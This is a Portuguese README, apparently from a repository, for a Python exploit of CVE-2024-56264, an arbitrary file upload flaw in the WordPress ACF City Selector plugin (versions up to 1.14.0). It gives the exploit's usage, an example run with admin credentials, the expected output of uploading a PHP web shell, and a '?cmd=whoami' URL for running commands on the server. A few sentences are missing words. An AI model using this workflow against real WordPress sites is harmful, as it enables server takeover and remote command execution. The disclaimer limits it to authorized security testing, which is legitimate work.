
Exploração em Python para CVE-2024-56264, uma vulnerabilidade de upload arbitrário de arquivos no plugin WordPress ACF City Selector <=1.14.0, permitindo execução remota de código por meio de upload de webshell.
Este repositório contém um exploit para CVE-2024-56264, que é uma vulnerabilidade de Upload Arbitrário de Arquivo encontrada no plugin ACF City Selector do WordPress (versões <= 1.14.0). Esta vulnerabilidade permite que um invasor carregue um arquivo PHP malicioso (web shell) em uma instância vulnerável do WordPress e execute comandos arbitrários no servidor.
<= 1.14.0O plugin ACF City Selector falha ao validar adequadamente os arquivos carregados, permitindo que invasores e carreguem . Uma vez que um arquivo PHP malicioso é carregado, um invasor pode executar comandos do sistema remotamente, levando a .
Certifique-se de que os seguintes itens estejam instalados antes de executar o script:
requests (Instale usando: pip install requests)Você pode instalar todas as dependências necessárias usando:
pip install -r requirements.txt
Executando o exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
Após exploração bem-sucedida, você deve ver:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
Se bem-sucedido, acesse o shell carregado via:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Isso permite execução remota de comandos no servidor.
Este script é destinado apenas para fins educacionais e de teste de segurança autorizados. O uso não autorizado é ilegal e pode resultar em consequências severas. O autor não é responsável por qualquer uso indevido deste exploit.